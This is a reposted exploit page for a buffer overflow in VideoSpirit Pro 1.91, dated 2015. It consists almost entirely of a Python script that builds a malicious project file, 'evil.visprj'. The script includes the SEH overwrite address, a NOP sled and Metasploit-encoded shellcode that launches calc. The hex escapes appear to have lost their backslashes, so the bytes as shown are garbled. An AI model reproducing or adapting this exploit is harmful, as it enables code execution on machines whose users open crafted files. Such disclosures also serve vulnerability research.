Home / os / blackberry
VideoSpirit Pro 1.91 Buffer Overflow
Posted on 28 April 2015
#!/usr/bin/python # Exploit Title: VideoSpirit Pro v1.91 # Date: 27/April/2015 # Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan # email: kwiha2003@yahoo.com # Version: 1.91 # Tested on: Win XP3 and Win 7 #Vendor: http://www.verytools.com/ #Software link: http://www.verytools.com/videospirit/download.html #Greetz: b33f,corelan,offsec,vulnhub,HUST510 buffersize=5000 Header=("x3Cx76x65x72x73x69x6Fx6Ex20x76x61x6Cx75x65x3Dx22x33x22x20"+ "x2Fx3Ex0Ax3Cx74x72x61x63x6Bx3Ex0Ax20x20x20x20x3Cx74x79x70"+ "x65x20x76x61x6Cx75x65x3Dx22x30x22x20x2Fx3Ex0Ax20x20x20x20"+ "x3Cx74x79x70x65x20x76x61x6Cx75x65x3Dx22x34x22x20x2Fx3Ex0A"+ "x20x20x20x20x3Cx74x79x70x65x20x76x61x6Cx75x65x3Dx22x32x22"+ "x20x2Fx3Ex0Ax20x20x20x20x3Cx74x79x70x65x20x76x61x6Cx75x65"+ "x3Dx22x31x22x20x2Fx3Ex0Ax20x20x20x20x3Cx74x79x70x65x20x76"+ "x61x6Cx75x65x3Dx22x37x22x20x2Fx3Ex0Ax3Cx2Fx74x72x61x63x6B"+ "x3Ex0Ax3Cx74x72x61x63x6Bx30x20x2Fx3Ex0Ax3Cx74x72x61x63x6B"+ "x31x20x2Fx3Ex0Ax3Cx74x72x61x63x6Bx32x20x2Fx3Ex0Ax3Cx74x72"+ "x61x63x6Bx33x20x2Fx3Ex0Ax3Cx74x72x61x63x6Bx34x20x2Fx3Ex0A"+ "x3Cx63x6Cx69x70x20x2Fx3Ex0Ax3Cx6Fx75x74x70x75x74x20x74x79"+ "x70x65x6Ex61x6Dx65x3Dx22x41x56x49x22x20x6Bx65x65x70x61x73"+ "x70x65x63x74x3Dx22x30x22x20x70x72x65x73x65x74x71x75x61x6C"+ "x69x74x79x3Dx22x30x22x3Ex0Ax20x20x20x20x3Cx74x79x70x65x30"+ "x20x65x6Ex61x62x6Cx65x3Dx22x31x22x3Ex0Ax20x20x20x20x20x20"+ "x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x6Dx73"+ "x6Dx70x65x67x34x76x32x22x20x76x61x6Cx75x65x3Dx22x6Dx73x6D"+ "x70x65x67x34x76x32x22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20"+ "x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x33x32x30x2A"+ "x32x34x30x28x34x3Ax33x29x22x20x76x61x6Cx75x65x3Dx22x33x32"+ "x30x2Ax32x34x30x22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20x3C"+ "x76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x33x30x22x20x76"+ "x61x6Cx75x65x3Dx22x33x30x22x20x2Fx3Ex0Ax20x20x20x20x20x20"+ "x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x31x36"+ "x30x30x30x6Bx22x20x76x61x6Cx75x65x3Dx22x31x36x30x30x30x6B"+ "x22x20x2Fx3Ex0Ax20x20x20x20x3Cx2Fx74x79x70x65x30x3Ex0Ax20"+ "x20x20x20x3Cx74x79x70x65x31x20x65x6Ex61x62x6Cx65x3Dx22x31"+ "x22x3Ex0Ax20x20x20x20x20x20x20x20x3Cx76x61x6Cx69x74x65x6D"+ "x20x6Ex61x6Dx65x3Dx22x6Dx70x33x22x20x76x61x6Cx75x65x3Dx22") buffer="A"*104 buffer += "xEBx07x90x90" #0x100caa30 : pop ebp # pop ecx # ret | {PAGE_EXECUTE_READ} [OverlayPlug.dll] buffer +="x30xaax0Cx10" buffer += "x90" * 24 #msfpayload windows/exec CMD=calc R|msfencode -b "x00x0ax0dx21x22" -t c -e x86/shikata_ga_nai buffer += ("xd9xc3xbax97xfdx6fx90xd9x74x24xf4x5ex33xc9xb1" "x32x31x56x17x03x56x17x83x79x01x8dx65x79x12xdb" "x86x81xe3xbcx0fx64xd2xeex74xedx47x3fxfexa3x6b" "xb4x52x57xffxb8x7ax58x48x76x5dx57x49xb6x61x3b" "x89xd8x1dx41xdex3ax1fx8ax13x3ax58xf6xdcx6ex31" "x7dx4ex9fx36xc3x53x9ex98x48xebxd8x9dx8ex98x52" "x9fxdex31xe8xd7xc6x3axb6xc7xf7xefxa4x34xbex84" "x1fxcex41x4dx6ex2fx70xb1x3dx0exbdx3cx3fx56x79" "xdfx4axacx7ax62x4dx77x01xb8xd8x6axa1x4bx7ax4f" "x50x9fx1dx04x5ex54x69x42x42x6bxbexf8x7exe0x41" "x2fxf7xb2x65xebx5cx60x07xaax38xc7x38xacxe4xb8" "x9cxa6x06xacxa7xe4x4cx33x25x93x29x33x35x9cx19" "x5cx04x17xf6x1bx99xf2xb3xd4xd3x5fx95x7cxbax35" "xa4xe0x3dxe0xeax1cxbex01x92xdaxdex63x97xa7x58" "x9fxe5xb8x0cx9fx5axb8x04xfcx3dx2axc4x03") buffer +="A"*(buffersize - (len(buffer))) Footer=("x22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20x3Cx76x61x6Cx69x74x65"+ "x6Dx20x6Ex61x6Dx65x3Dx22x31x32x38x6Bx22x20x76x61x6Cx75x65x3D"+ "x22x31x32x38x6Bx22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20x3Cx76"+ "x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x34x34x31x30x30x22x20"+ "x76x61x6Cx75x65x3Dx22x34x34x31x30x30x22x20x2Fx3Ex0Ax20x20x20"+ "x20x20x20x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22"+ "x32x20x28x53x74x65x72x65x6Fx29x22x20x76x61x6Cx75x65x3Dx22x32"+ "x22x20x2Fx3Ex0Ax20x20x20x20x3Cx2Fx74x79x70x65x31x3Ex0Ax20x20"+ "x20x20x3Cx74x79x70x65x32x20x65x6Ex61x62x6Cx65x3Dx22x30x22x20"+ "x2Fx3Ex0Ax3Cx2Fx6Fx75x74x70x75x74x3E") sploit = Header + buffer + Footer try: print "[+]Creating Exploit File... " file = open("evil.visprj","w") file.write(sploit) file.close print "[+]File evil.visprj create successfully. " except: print "*Failed to create file!!! "
